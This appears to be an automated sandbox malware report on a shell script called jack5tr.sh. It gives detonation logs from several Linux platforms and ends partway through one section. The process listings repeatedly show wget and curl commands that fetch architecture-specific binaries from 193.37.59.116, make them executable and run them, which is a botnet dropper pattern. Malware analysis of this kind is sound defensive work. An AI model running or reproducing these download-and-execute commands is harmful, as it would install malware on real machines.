Malware Analysis Report

2025-01-23 14:36

Sample ID 240829-x8p5qazajl
Target jack5tr.sh
SHA256 7c437f0cde14f1837f25bfcd49c486da5a1d6c749d55749ae1a5ab26ee4d4e7a
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

7c437f0cde14f1837f25bfcd49c486da5a1d6c749d55749ae1a5ab26ee4d4e7a

Threat Level: Shows suspicious behavior

The file jack5tr.sh was found to show suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

cURL User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 19:31

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

debian9-mipsbe-20240611-en

Max time kernel

34s

Max time network

35s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-WfRFJD x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp

Files

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

3s

Max time network

180s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x config-err-iEKf7O jack5tr.sh netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc config-err-iEKf7O jack5tr.sh mips netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-iEKf7O jack5tr.sh m68k mips mpsl netplan_e2yeal45 ppc RUN sh4 snap-private-tmp spc ssh-eQSbXsy1sOJZ systemd-private-0548783c80f8493da07979fa7107a630-bolt.service-WnKfox systemd-private-0548783c80f8493da07979fa7107a630-colord.service-WjjxOC systemd-private-0548783c80f8493da07979fa7107a630-ModemManager.service-OWrjsW systemd-private-0548783c80f8493da07979fa7107a630-systemd-resolved.service-ihwtga systemd-private-0548783c80f8493da07979fa7107a630-systemd-timedated.service-V6ikp4 x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
GB 89.187.167.5:443 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.98:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 daisy.ubuntu.com udp

Files

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

6s

Max time network

180s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x config-err-YYA4jL jack5tr.sh RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x arc config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x arc arm config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x arc arm arm5 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

